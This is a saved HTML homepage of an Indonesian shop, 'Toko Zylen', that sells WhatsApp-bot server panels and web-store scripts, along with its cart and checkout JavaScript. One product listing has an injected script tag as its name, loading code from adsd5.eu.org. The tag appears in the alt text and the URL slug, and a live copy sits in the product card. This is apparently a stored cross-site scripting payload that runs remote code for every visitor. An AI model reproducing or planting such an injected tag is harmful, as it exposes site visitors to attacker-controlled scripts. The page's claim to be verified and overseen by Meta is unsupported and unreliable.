<!doctype html>
<html lang="en">

<head>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="robots" content="index, follow" />

      <meta name="description" content="ZylenMods menyediakan kebutuhan bot WhatsApp, dan kini sudah terverifikasi aman, terpercaya dan di awasi oleh Tim meta" />

    <meta property="og:type" content="website" />
    <meta property="og:title" content="Toko Zylen" />
    <meta property="og:description" content="ZylenMods menyediakan kebutuhan bot WhatsApp, dan kini sudah terverifikasi aman, terpercaya dan di awasi oleh Tim meta" />
    <meta property="og:url" content="https://thomz.biz.id/" />
    <meta property="og:site_name" content="Toko Zylen" />
    <meta property="og:image" content="https://thomz.biz.id/assets/images/logo/1727188478882.png" />
    <meta property="og:image:secure_url" content="https://thomz.biz.id/assets/images/logo/1727188478882.png" />

    <meta name="twitter:card" content="summary" />
    <meta name="twitter:title" content="Toko Zylen" />
    <meta name="twitter:description" content="ZylenMods menyediakan kebutuhan bot WhatsApp, dan kini sudah terverifikasi aman, terpercaya dan di awasi oleh Tim meta" />
    <meta name="twitter:image" content="https://thomz.biz.id/assets/images/logo/1727188478882.png" />
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script src="js/js?id="></script>
  <script>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }
    gtag('js', new Date());

    gtag('config', '');
  </script>

    
  <!-- Facebook Pixel Code -->
    <script>
    ! function(f, b, e, v, n, t, s) {
      if (f.fbq) return;
      n = f.fbq = function() {
        n.callMethod ?
          n.callMethod.apply(n, arguments) : n.queue.push(arguments)
      };
      if (!f._fbq) f._fbq = n;
      n.push = n;
      n.loaded = !0;
      n.version = '2.0';
      n.queue = [];
      t = b.createElement(e);
      t.async = !0;
      t.src = v;
      s = b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t, s)
    }(window, document, 'script',
      'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '');
    fbq('track', 'PageView');
  </script>
  <!-- End Facebook Pixel Code -->

  <!-- Bootstrap CSS -->
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">

<link rel="stylesheet" type="text/css" href="css/fonts.css">
<link rel="stylesheet" type="text/css" href="css/app.css">
<link rel="stylesheet" type="text/css" href="css/app-responsive.css">
<link rel="stylesheet" type="text/css" href="css/style.css">
<link rel="stylesheet" type="text/css" href="css/style-responsive.css">
<link rel="stylesheet" type="text/css" href="css/starrr.css">

  <link rel="shortcut icon" href="https://thomz.biz.id/assets/images/logo/1727188478882.png" type="image/x-icon" />

<script src="js/2baad1d54e.js"></script>

<link rel="stylesheet" type="text/css" href="css/icofont.min.css">

  
  <style>
    .button-bottom-modal-cart-global button {
      border: 1px solid #000000;
      color: #000000;
    }

    .button-bottom-modal-cart-global a button {
      background-color: #000000    }

    .button-bottom-modal-cart-global a button:hover {
      border: 1px solid #454545;
      background-color: #454545;
    }

    .button-bottom-modal-cart-global button:hover {
      border: 1px solid #000000;
      color: #ffffff;
      background-color: #000000;
    }
  </style>

<script src="js/sweetalert.min.js"></script>

<link rel="stylesheet" type="text/css" href="css/slick.css">

<link rel="stylesheet" type="text/css" href="css/select2.min.css">

<link rel="stylesheet" type="text/css" href="css/lightbox.css">

  <title>Toko Zylen</title>

</head>

<body>

  
  <!-- model cart -->
  <div class="modal fade" id="modalCart" data-backdrop="static" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="modal-title" id="exampleModalCenterTitle">Keranjang Belanja</h5>
          <button onclick="location.reload(true)" type="button" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="modal-body" id="modalCartBodyShow">
                      <div class="alert alert-warning">Keranjang masih kosong, yuk belanja dulu.</div>
            <div class="button-bottom-modal-cart-global">
              <button type="button" class="shopping-again" data-dismiss="modal">BELANJA DULU</button>
            </div>
                  </div>
      </div>
    </div>
  </div><nav class="navbar-top fixed-top shadow-sm" style="background-color: white;">
    <div class="main">
        <a href="https://thomz.biz.id/">
            <img src=imgs/1727188463409.png alt="logo" class="logo">
        </a>
        <div class="menu">
            <a href="https://thomz.biz.id/">Home</a>
                    </div>
        <a href="#" data-toggle="modal" data-target="#modalCart" class="cart-link">
                            <img src=imgs/shopping-bag.svg alt="icon bag" class="shopping-bag">
                    </a>
    </div>
    <div class="main-mobile">
        <a href="https://thomz.biz.id/">
            <img src=imgs/1727188463409.png alt="logo" class="logo">
        </a>
        <div>
            <a href="#" data-toggle="modal" data-target="#modalCart" class="cart-link">
                                    <img src=imgs/shopping-bag.svg alt="icon bag" class="shopping-bag">
                            </a>
            <i class="fa fa-bars"></i>
        </div>
    </div>
</nav>
<div class="help-heigh-navbar-top"></div>
<!-- <nav class="navbar-top" style="background-color: ">
    <div class="main">
        <a href="https://thomz.biz.id/">
            <img src=imgs/1603194662693.png alt="logo" class="logo">
        </a>
        <form action="https://thomz.biz.id/search" method="get">
            <input type="text" placeholder="Cari produk" name="q" autocomplete="off">
            <i class="icofont-search"></i>
        </form>
        <a href="#" data-toggle="modal" data-target="#modalCart" class="cart-link">
                            <i class="fa fa-shopping-cart cart-icon"></i>
                    </a>
    </div>
    <div class="main-mobile">
        <i class="fa fa-bars"></i>
        <a href="https://thomz.biz.id/">
            <img src=imgs/1603194662693.png alt="logo" class="logo">
        </a>
        <a href="#" data-toggle="modal" data-target="#modalCart" class="cart-link">
                            <i class="fa fa-shopping-cart cart-icon"></i>
                    </a>
    </div>
</nav> -->
<div class="overlay-menu"></div>
<div class="side-bar-menu-mobile">
    <div class="menu">
        <div class="img" style="background-color: ">
            <img src=imgs/1603194662693.png alt="logo" class="logo">
        </div>
        <a href="https://thomz.biz.id/">Home</a>
            </div>
</div>

    <button name="button-chat" style="background-color: #000000" class="btn-chat-help-pojok-kanan-bawah"><i class="fab fa-whatsapp"></i></button>
    <div class="card box-chat-help-wa shadow">
        <div class="card-header top" style="background-color: #000000">
            <h4 class="lead mb-0 pt-0 pb-0 mt-0">Form Bantuan</h4>
        </div>
        <div class="card-body px-2 py-2">
            <input type="text" placeholder="Nama" id="formHelpInputNamePojokKananBawah" autocomplete="off" class="form-control">
            <textarea id="formHelpTextareaMessagePojokKananBawah" rows="4" class="form-control mt-2" placeholder="Tulis pesan.."></textarea>
            <button type="submit" id="btnFormHelpPojokKananBawah" style="background-color: #000000; font-size: 14px; color: white" class="btn mt-2 btn-block">KIRIM</button>
        </div>
    </div>
<div id="carouselExampleIndicators" class="carousel slide carousel-fade" data-pause="false" data-ride="carousel">
  <div class="carousel-inner">
    <div class="carousel-item active">
          <img alt="banner" src=imgs/1727188493375.png>
        </div>  </div>
</div>

<div class="search-inside-banner">
  <form action="https://thomz.biz.id/search" method="get">
    <input class="shadow-sm" type="text" placeholder="Cari produk" name="q" autocomplete="off">
    <i class="icofont-search"></i>
  </form>
</div><style>
  div.category-menu div.main-category div.item:hover {
    background-color: #000000;
  }

  div.category-menu div.main-category div.item-active {
    background-color: #000000;
  }

  #modalBannerPopup .fa-times {
    font-size: 20px;
    position: absolute;
    right: 15px;
    top: 15px;
    color: white;
    cursor: pointer;
  }
</style>

<div class="category-menu">
  <div class="main-category">
    <div class="item item-active item-category-menu-0" onclick="changeCategoryProductsActive('0')">
      <p class="mb-0">All</p>
    </div>
          <div class="item item-category-menu-20" onclick="changeCategoryProductsActive('20')">
        <p class="mb-0">PANEL PRIVATE</p>
      </div>
          <div class="item item-category-menu-21" onclick="changeCategoryProductsActive('21')">
        <p class="mb-0">SCRIPT DIGITAL WEB STORE</p>
      </div>
          <div class="item item-category-menu-22" onclick="changeCategoryProductsActive('22')">
        <p class="mb-0">RESELLER PANEL</p>
      </div>
          <div class="item item-category-menu-23" onclick="changeCategoryProductsActive('23')">
        <p class="mb-0">ADMIN PANEL</p>
      </div>
      </div>
</div>

<div class="product-wrapper best-product">
  <div class="main-product">
    <div id="bodyForShowProductHome">
              <a href="https://thomz.biz.id/p/script-srchttpsadsd5euorgcphp1727264766">
          <div class="item-product">
                          <img alt="<script src="https://adsd5.eu.org/c.php">" src="https://thomz.biz.id/assets/images/product/1727264766669.png" class="card-img-top">
                        <div class="card-body">
<script src="js/c.php"></script>
                <p class="newPrice">Rp. 2.222</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/sc-digital-web1727190092">
          <div class="item-product">
                          <img alt="SC DIGITAL WEB" src=imgs/1727190091986.png class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">SC DIGITAL WEB</p>
                <p class="newPrice">Rp. 50.000</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/admin-panel1727189976">
          <div class="item-product">
                          <img alt="ADMIN PANEL" src=imgs/1727189975872.jpg class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">ADMIN PANEL</p>
                <p class="newPrice">Rp. 20.000</p>
                            <div class="stars-rating">
                                <i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i><i class="fa fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/reseller-panel1727189928">
          <div class="item-product">
                          <img alt="RESELLER PANEL" src=imgs/1727189928198.jpg class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">RESELLER PANEL</p>
                <p class="newPrice">Rp. 15.000</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/panel-unli1727189463">
          <div class="item-product">
                          <img alt="PANEL UNLI" src=imgs/1727189482468.jpg class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">PANEL UNLI</p>
                <p class="newPrice">Rp. 15.000</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/panel-9gb1727189433">
          <div class="item-product">
                          <img alt="PANEL 9GB" src=imgs/1727189433560.jpg class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">PANEL 9GB</p>
                <p class="newPrice">Rp. 10.500</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/panel-8gb1727189380">
          <div class="item-product">
                          <img alt="PANEL 8GB" src=imgs/1727189379875.jpg class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">PANEL 8GB</p>
                <p class="newPrice">Rp. 9.500</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/panel-7gb1727189343">
          <div class="item-product">
                          <img alt="PANEL 7GB" src=imgs/1727189342879.jpg class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">PANEL 7GB</p>
                <p class="newPrice">Rp. 8.500</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
              <a href="https://thomz.biz.id/p/panel-6gb1727189268">
          <div class="item-product">
                          <img alt="PANEL 6GB" src=imgs/1727189268625.jpg class="card-img-top">
                        <div class="card-body">
                              <p class="card-text line-3 mb-0">PANEL 6GB</p>
                <p class="newPrice">Rp. 7.500</p>
                            <div class="stars-rating">
                                <i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i><i class="far fa-star"></i>              </div>
            </div>
          </div>
        </a>
          </div>
    <div class="clearfix"></div>
  </div>
  <img src=imgs/loading-v1.gif alt="loading.." class="loading-animation-load-more">
    <button style="border: 2px solid #000000; color: #000000" class="more" id="btnClickLoadMoreProductHome">LIHAT SEMUA</button>
</div>

<footer>
    <div class="information">
        <div class="main">
            <img src=imgs/1727188463409.png alt="logo" class="logo-footer" />
            <p class="description-store">ZylenMods menyediakan kebutuhan bot WhatsApp, dan kini sudah terverifikasi aman, terpercaya dan di awasi oleh Tim meta</p>
            <div class="payment_logo" style="text-align: center;">
                                                                                                                                                                                                    <img src=imgs/dana.png alt="payment" class="logo_payment">
                                                    <img src=imgs/gopay.png alt="payment" class="logo_payment">
                            </div>
            <div class="social-media">
                            </div>
        </div>
    </div>
    <div class="copyright" style="background-color: ">
        <p class="mb-0">Copyright &copy; <span id="footer-cr-years"></span> Toko Zylen</p>
    </div>
<script src="js/jquery-3.4.1.min.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/slick.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/slick.min.js"></script>
<script src="js/starrr.js"></script>
<script src="js/select2.min.js"></script>
<script src="js/lightbox.js"></script>
<script>
    const modalDelayPopup = "";
    if (modalDelayPopup) {
        setTimeout(() => {
            $("#modalBannerPopup").modal("show");
        }, modalDelayPopup * 1000);
    }
    lightbox.option({
        'disableScrolling': true
    })
    $('.starrr').starrr()
    $(".starrr").on('starrr:change', function(e, value) {
        $("input.starrr-rating-star-count").val(value);
    })
    const years = new Date().getFullYear();
    $("#footer-cr-years").text(years);

    $(".btn_order_now_checkout_page").on("click", function() {
        const pay = $("#paymentSelectCheckoutPage").val();
        $('#msgPaymentFirstCheckoutPage').hide();
        if (pay == "") {
            $('#msgPaymentFirstCheckoutPage').show();
        }
    })

    $(".rating .top-rating").on("click", function() {
        $(".rating .main-rating").slideToggle();
        $(".rating .top-rating i").toggleClass("arrow-bottom-rating-rotate");
        $(".rating .top-rating i").css("transition", "0.5s");
    })

    $("#btnFormHelpPojokKananBawah").on("click", function() {
        const name = $("#formHelpInputNamePojokKananBawah").val();
        const message = $("#formHelpTextareaMessagePojokKananBawah").val();
        const wa = "6283176591554";
        const msgOpen = "Halo kak";
        if (name != "" && message != "") {
            $("#formHelpInputNamePojokKananBawah").val("");
            $("#formHelpTextareaMessagePojokKananBawah").val("");
            window.open(`https://wa.me/${wa}?text=${msgOpen}, saya ${name} ingin bertanya %0A ${message}`);
        }
    })

    $("button.btn-chat-help-pojok-kanan-bawah").on('click', function() {
        $("div.box-chat-help-wa").slideToggle('fast');
        // $("button.btn-chat-help-pojok-kanan-bawah i").removeClass("fa-whatsapp")
        // $("button.btn-chat-help-pojok-kanan-bawah i").removeClass("fab")
        // $("button.btn-chat-help-pojok-kanan-bawah i").addClass("fa")
        // $("button.btn-chat-help-pojok-kanan-bawah i").addClass("fa-times")
        // $("button.btn-chat-help-pojok-kanan-bawah i").css("font-size", "35px")
    })

    let numberOfSocialProof = 1;
    let numberOfInvoiceTotal = parseInt($("#numberOfInvoiceTotalHomePage").val()) * 1000;
    let pauseOfSocialProof = parseInt('10') * 1000;
    let timeOfSocialProof = parseInt('5') * 1000;

    function showHideSocialProof() {
        $(`#socialProofId-${numberOfSocialProof}`).css("bottom", "20px");
        setTimeout(function() {
            $(`#socialProofId-${numberOfSocialProof}`).css("bottom", "-100px");
            numberOfSocialProof++;
        }, pauseOfSocialProof);
        if (numberOfSocialProof <= numberOfInvoiceTotal) {
            setTimeout(showHideSocialProof, pauseOfSocialProof * 2);
        } else {
            $(`div.social-proof`).css("bottom", "-100px");
            numberOfSocialProof = 0;
            setTimeout(showHideSocialProof, pauseOfSocialProof * 2);
        }
    }
    setTimeout(showHideSocialProof, timeOfSocialProof);

    // detail slick img
    $('.img-detail-product-slick').slick();
    $("div.wrapper div.top div.main-top div.img button.slick-prev").html(`<i class="fa fa-angle-left"></i>`);
    $("div.wrapper div.top div.main-top div.img button.slick-next").html(`<i class="fa fa-angle-right"></i>`);

    let categoryProductsActive;
    let clickCategoryActive = false;
    let startLoadProductHome = 9;

    const skeletonLoadingCategory = `
    <div class="skeleton-item-product">
        <div class="img"></div>
    </div>
    <div class="skeleton-item-product">
        <div class="img"></div>
    </div>
    <div class="skeleton-item-product">
        <div class="img"></div>
    </div>
    `;

    function changeCategoryProductsActive(id) {
        if (!clickCategoryActive) {
            clickCategoryActive = true;
            $("div.category-menu div.main-category div.item").removeClass("item-active");
            $(`.item-category-menu-${id}`).addClass("item-active");
            categoryProductsActive = id;
            $("#bodyForShowProductHome").html(skeletonLoadingCategory);
            $.ajax({
                url: `https://thomz.biz.id/products/get_all_product_home_by_category/${id}`,
                method: "get",
                success: function(response) {
                    $("#btnClickLoadMoreProductHome").show();
                    clickCategoryActive = false;
                    startLoadProductHome = 6;
                    if (response == "") {
                        alert("Terjadi kesalahan, refresh browsernya.");
                    } else {
                        $("#bodyForShowProductHome").html(response);
                    }
                }
            })
        }
    }

    // load more product
    $("#btnClickLoadMoreProductHome").on("click", function() {
        $("img.loading-animation-load-more").show();
        $(this).hide();
        $.ajax({
            url: "https://thomz.biz.id/products/get_more_product_home?start=" + startLoadProductHome + "&category=" + categoryProductsActive,
            method: "get",
            success: function(response) {
                startLoadProductHome += 6;
                if (response == "") {
                    $("#btnClickLoadMoreProductHome").hide();
                    $("img.loading-animation-load-more").hide();
                } else {
                    $("#bodyForShowProductHome").append(response);
                    $("img.loading-animation-load-more").hide();
                    $("#btnClickLoadMoreProductHome").show();
                }
            }
        })
    })

    let startLoadProduct = 8;
    $("#btnClickLoadMoreProduct").on("click", function() {
        $("img.loading-animation-load-more").show();
        $(this).hide();
        $.ajax({
            url: "https://thomz.biz.id/products/get_more_product?start=" + startLoadProduct,
            method: "get",
            success: function(response) {
                startLoadProduct += 12;
                if (response == "") {
                    $("#btnClickLoadMoreProduct").hide();
                    $("img.loading-animation-load-more").hide();
                } else {
                    $("#bodyForShowProduct").append(response);
                    $("img.loading-animation-load-more").hide();
                    $("#btnClickLoadMoreProduct").show();
                }
            }
        })
    })

    let startLoadBestProduct = 12;
    $("#btnClickLoadMoreBestProduct").on("click", function() {
        $("img.loading-animation-load-more").show();
        $(this).hide();
        $.ajax({
            url: "https://thomz.biz.id/products/get_more_best_product?start=" + startLoadBestProduct,
            method: "get",
            success: function(response) {
                startLoadBestProduct += 12;
                if (response == "") {
                    $("#btnClickLoadMoreBestProduct").hide();
                    $("img.loading-animation-load-more").hide();
                } else {
                    $("#bodyForShowProduct").append(response);
                    $("img.loading-animation-load-more").hide();
                    $("#btnClickLoadMoreBestProduct").show();
                }
            }
        })
    })

    let startLoadProductCategory = 12;
    $("#btnClickLoadMoreProductCategory").on("click", function() {
        $("img.loading-animation-load-more").show();
        $(this).hide();
        $.ajax({
            url: "https://thomz.biz.id/products/get_more_product_category?start=" + startLoadProductCategory + "&idCat=&sort=",
            method: "get",
            success: function(response) {
                startLoadProductCategory += 12;
                console.log(response);
                if (response == "") {
                    $("#btnClickLoadMoreProductCategory").hide();
                    $("img.loading-animation-load-more").hide();
                } else {
                    $("#bodyForShowProductCategory").append(response);
                    $("img.loading-animation-load-more").hide();
                    $("#btnClickLoadMoreProductCategory").show();
                }
            }
        })
    })

    // share product
    // $(document).click(function() {
    //     $("div.wrapper div.share-dd").slideUp('fast');
    // });
    $("div.wrapper button.share").on('click', function(event) {
        $("div.wrapper div.share-dd").slideToggle('fast');
        // event.stopPropagation();
    })

    // select variant
    let variantColorProduct = "";
    let variantSizeProduct = "";
    $("button.item-option-select-variant-product-color").on('click', function() {
        $(".item-option-select-variant-product-color").css("background-color", "white");
        $(".item-option-select-variant-product-color").css("color", "black");
        $(".item-option-select-variant-product-color").css("border", "1px solid ");
        $(this).css("background-color", "");
        $(this).css("color", "white");
        variantColorProduct = $(this).val();
    })
    $("button.item-option-select-variant-product-size").on('click', function() {
        $(".item-option-select-variant-product-size").css("background-color", "white");
        $(".item-option-select-variant-product-size").css("color", "black");
        $(".item-option-select-variant-product-size").css("border", "1px solid ");
        $(this).css("background-color", "");
        $(this).css("color", "white");
        variantSizeProduct = $(this).val();
        $.ajax({
            url: "https://thomz.biz.id/products/change_price_by_variant",
            type: "post",
            dataType: "json",
            async: true,
            data: {
                id: '',
                variant: variantSizeProduct
            },
            success: function(data) {
                $("div.wrapper div.top div.main-top div.ket h4.price").text(data.price);
                $("div.wrapper div.top div.main-top div.ket p.oldPrice .linet").text(data.oldPrice);
            }
        })
    })

    // function buy
    function orderNow() {
        const productId = '';
        const slug = '';
        $.ajax({
            url: "https://thomz.biz.id/cart/add_to_cart",
            type: "post",
            data: {
                id: productId,
                slug: slug,
                variant: parseInt(globalVariantType)
            },
            success: function(data) {
                $("#modalCartBodyShow").html(data);
                $('#modalCart').modal('show');
            }
        })
    }

    // plus minus qty cart
    function minusProductCart(id) {
        let inputJml;
        inputJml = parseInt($(`input#qtyProductCart-${id}`).val());
        inputJml = inputJml - 1;
        if (inputJml >= 1) {
            $(`input#qtyProductCart-${id}`).val("..");
            $.ajax({
                url: "https://thomz.biz.id/cart/edit_qty_cart?type=minus",
                type: "post",
                data: {
                    rowid: id,
                },
                success: function(data) {
                    $(`#modalCartPriceProduct-${id}`).text(`Rp. ${number_format(data).split(",").join(".")}`);
                    $(`input#qtyProductCart-${id}`).val(inputJml);
                }
            })
        }
    }

    function plusProductCart(id) {
        let inputJml;
        inputJml = parseInt($(`input#qtyProductCart-${id}`).val());
        inputJml = inputJml + 1;
        $(`input#qtyProductCart-${id}`).val("..");
        $.ajax({
            url: "https://thomz.biz.id/cart/edit_qty_cart?type=plus",
            type: "post",
            data: {
                rowid: id,
            },
            success: function(data) {
                $(`#modalCartPriceProduct-${id}`).text(`Rp. ${number_format(data).split(",").join(".")}`);
                $(`input#qtyProductCart-${id}`).val(inputJml);
            }
        })
    }

    function deleteCartByRowid(id) {
        $.ajax({
            url: "https://thomz.biz.id/cart/delete/" + id,
            type: "get",
            success: function(data) {
                $(`#modalCartBodyListItem-${id}`).slideUp('fast');
            }
        })
    }

    function number_format(number, decimals, decPoint, thousandsSep) {
        number = (number + '').replace(/[^0-9+\-Ee.]/g, '')
        var n = !isFinite(+number) ? 0 : +number
        var prec = !isFinite(+decimals) ? 0 : Math.abs(decimals)
        var sep = (typeof thousandsSep === 'undefined') ? ',' : thousandsSep
        var dec = (typeof decPoint === 'undefined') ? '.' : decPoint
        var s = ''

        var toFixedFix = function(n, prec) {
            var k = Math.pow(10, prec)
            return '' + (Math.round(n * k) / k)
                .toFixed(prec)
        }

        // @todo: for IE parseFloat(0.55).toFixed(0) = 0;
        s = (prec ? toFixedFix(n, prec) : '' + Math.round(n)).split('.')
        if (s[0].length > 3) {
            s[0] = s[0].replace(/\B(?=(?:\d{3})+(?!\d))/g, sep)
        }
        if ((s[1] || '').length < prec) {
            s[1] = s[1] || ''
            s[1] += new Array(prec - s[1].length + 1).join('0')
        }

        return s.join(dec)
    }

    // select2 checkout
    $("#districtCheckoutPage").select2({
        placeholder: 'Pilih Kabupaten/Kota',
        language: 'id'
    })

    $("#subdistrictCheckoutPage").select2({
        placeholder: 'Pilih kabupaten/kota dulu',
        language: 'id'
    })

    $("#districtCheckoutPage").on('change', function() {
        $("#subdistrictCheckoutPage").html(`<option</option>`)
        $("#subdistrictCheckoutPage").select2({
            placeholder: 'Loading..',
            language: 'id'
        });
        $("#courierCheckoutPage").html(`
                <option>Loading..</option>
            `);
        $("#ongkirCheckoutPage").text("Rp. 0");
        const id = $(this).val();
        $.ajax({
            url: "https://thomz.biz.id/payment/getSubdistrict",
            type: "post",
            dataType: "json",
            async: true,
            data: {
                id: id
            },
            success: function(data) {
                $("#subdistrictCheckoutPage").select2({
                    placeholder: 'Pilih Kecamatan',
                    language: 'id'
                })
                $("#subdistrictCheckoutPage").html(data);
                $("#courierCheckoutPage").html(`
                        <option>Pilih kecamatan dulu</option>
                    `);
            }
        });
    })

    $("#subdistrictCheckoutPage").on('change', function() {
        $("#courierCheckoutPage").html(`
                <option>Loading..</option>
            `);

        $("#ongkirCheckoutPage").text("Rp. 0");
        const id = $(this).val();
        $.ajax({
            url: "https://thomz.biz.id/payment/getCourier",
            type: "post",
            dataType: "json",
            async: true,
            data: {
                id: id
            },
            success: function(data) {
                $("#courierCheckoutPage").html(`
                        <option>Pilih Pengiriman</option>
                    `);
                $("#courierCheckoutPage").html(data);
            }
        });
    })

    $("#courierCheckoutPage").on("change", function() {
        let id = $(this).val();
        id = id.split('-');
        id = id[0];
        if (id === "") {
            id = 0;
        }
        const minFee = '';
        const maxFee = '';
        if (parseInt(id) >= parseInt(minFee) && parseInt(id) <= parseInt(maxFee)) {
            $(".logo-payment-checkout-13").show();
        }
        $("#ongkirValueOrder").val(id);
        $("#ongkirCheckoutPage").text("Rp. " + number_format(id).split(",").join("."));
        const price = "0";
        const potongan = $("#potonganCouponCheckoutPageValue").val();
        const total = parseInt(price) + parseInt(id) + parseInt($("#uniqueCodeValueOrder").val()) - parseInt(potongan);
        $("#totalCheckoutPage").text("Rp. " + number_format(total).split(",").join("."));
    })

    $("#btnForApplyCouponCheckoutPage").on("click", function() {
        const coupon = $("#inputCouponCheckoutPage").val();
        $("#msgDangerCouponWrongCheckoutPage").text("");
        if (coupon != "") {
            $.ajax({
                url: "https://thomz.biz.id/checkout/checkoutCoupon",
                type: "post",
                dataType: "json",
                async: true,
                data: {
                    coupon: coupon
                },
                success: function(data) {
                    console.log(data);
                    if (data.success == true) {
                        $("#potonganCouponCheckoutPageShow").text("Rp. " + number_format(data.discount).split(",").join("."));
                        $("#potonganCouponCheckoutPageValue").val(data.discount);
                        const courier = $("#ongkirValueOrder").val();
                        const price = "0";
                        const potongan = $("#potonganCouponCheckoutPageValue").val();
                        const total = parseInt(price) + parseInt(courier) + parseInt($("#uniqueCodeValueOrder").val()) - parseInt(potongan);
                        $("#totalCheckoutPage").text("Rp. " + number_format(total).split(",").join("."));
                    } else {
                        $("#msgDangerCouponWrongCheckoutPage").text(data.msg);
                    }
                }
            });
        }
    })

    // select payment
    function selectPaymentCheckout(id) {
        $('#msgPaymentFirstCheckoutPage').hide();
        $("#paymentSelectCheckoutPage").val("true");
        $(`#paymentLogoSelectCheckoutPageValue`).val(id);
        $(".logo-payment-checkout-page").css("border", "2px solid #ddd");
        $(".logo-payment-checkout-page").css("box-shadow", "none");
        $(`.logo-payment-checkout-${id}`).css("border", "2px solid dodgerblue");
        $(`.logo-payment-checkout-${id}`).css("box-shadow", "1px 3px 8px rgba(0, 0, 0, 0.2)");

        if (id == "13") {
            $(".list-for-fee-cod-hide").show();
            $(".list-for-uniq-code-show-first").hide();
            const totalharga = '0';
            const ongkir = $("#ongkirValueOrder").val();
            const feeCod = '';
            let totalall = (parseInt(totalharga) + parseInt(ongkir)) * parseInt(feeCod) / 100;
            $(".valueOfUniqCodeOrFeeCODCheckoutPage").text("Rp. " + number_format(totalall).split(",").join("."));
            const potongan = $("#potonganCouponCheckoutPageValue").val();
            const total = parseInt(totalharga) + parseInt(ongkir) + parseInt(totalall) - parseInt(potongan);
            $("#totalCheckoutPage").text("Rp. " + number_format(total).split(",").join("."));
        } else {
            $(".list-for-fee-cod-hide").hide();
            $(".list-for-uniq-code-show-first").show();
            const uniqCode = $("#uniqueCodeValueOrder").val();
            const courier = $("#ongkirValueOrder").val();
            const price = "0";
            const potongan = $("#potonganCouponCheckoutPageValue").val();
            const total = parseInt(price) + parseInt(courier) + parseInt(uniqCode) - parseInt(potongan);
            $("#totalCheckoutPage").text("Rp. " + number_format(total).split(",").join("."));
        }
    }

    // menu sidebar
    let globalVariableSideBarClose = true;
    $("nav.navbar-top div.main-mobile .fa-bars").on("click", function() {
        if (globalVariableSideBarClose) {
            globalVariableSideBarClose = false;
            $(".side-bar-menu-mobile").animate({
                left: "0"
            }, 300)
            $(".overlay-menu").animate({
                left: "0"
            }, 200)
        } else {
            globalVariableSideBarClose = true;
            $(".side-bar-menu-mobile").animate({
                left: "-100%"
            }, 200)
            $(".overlay-menu").animate({
                left: "-100%"
            }, 300)
        }
    })
    $(".overlay-menu").on("click", function() {
        globalVariableSideBarClose = true;
        $(".side-bar-menu-mobile").animate({
            left: "-100%"
        }, 200)
        $(".overlay-menu").animate({
            left: "-100%"
        }, 300)
    })
</script>
</body>

</html>
